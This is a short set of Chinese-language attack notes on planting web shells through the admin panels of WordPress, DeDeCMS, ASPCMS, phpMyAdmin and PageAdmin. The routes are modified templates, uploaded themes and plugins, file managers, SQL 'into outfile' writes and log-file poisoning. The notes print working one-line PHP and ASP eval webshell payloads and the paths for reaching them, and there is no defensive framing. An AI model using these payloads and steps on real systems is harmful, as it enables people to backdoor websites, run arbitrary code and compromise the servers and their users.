一、wordpass
1.修改模版文件getshell
- 搭建网站
- 登录网站后台
- 更改网站模版的相关文件
- 写入一句话木马
-
凭借路径访问
/wp-content/themes/twentyfifteen/404.php/?a=phpinfo();
2.上传夹带木马的主题getshell
外观-->主题-->添加-->上传-->浏览-->安装-->访问木马文件
主题打包上传使用,拼接路径访问
/wp-content/themes/1/1.php
二、DeDeCMS
1.文件上传管理器上传木马getshell
进入后台--》核心--》文件管理器--》文件上传。上传完后使用上方路径拼接访问即可。
2.更改模版getshell
在模版模块在index.htm里写入一句话木马,更改html文件为php文件后访问。
3.系统sql注入getshell
在系统内的sql命令行执行中,可以先访问它的数据库绝对路径,根据该路径去推测网站绝对路径,写入一句话木马到网站绝对路径下。访问文件连接
select @@basedir
select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/'
三、ASPCMS
修改配置文件getshell
登录网站后台登录后-->扩展功能-->幻灯片设置-->保存-->抓包更改请求体内容
http://ip/admin_aspcms/index.asp
抓包后更改内容要保证人家原有的%>能够闭合
%25><%25eval (request(chr(65)))%25><%25
四、phpmyadmin
1.通过日志文件getshell
更改日志开启模式,确保日志文件开启,并更改日志文件存放位置
在sql语句输入框内输入一句话木马,那么我们的木马就会被带到日志文件中,我们访问日志文件即可连接。
2.写入文件getshell
在该执行框中执行我们的命令,先查看数据库路径地址推测网站绝对路径.
select @@basedir
select '<?php @eval($_POST[a]);?>' into outfile 'D:php/www/1.php'
五、Pageadmin
1.上传模版getshell
上传还有木马文件的zip查插件安装包,如果是正版的是可以进行解压的,这里不是正版,各位知道一下即可。
2.上传文件getshel
在工具里面的常用工具,文件管理上传我们压缩后的木马文件,解压就可以得到我们的asp可执行脚本文件。访问连接即可。
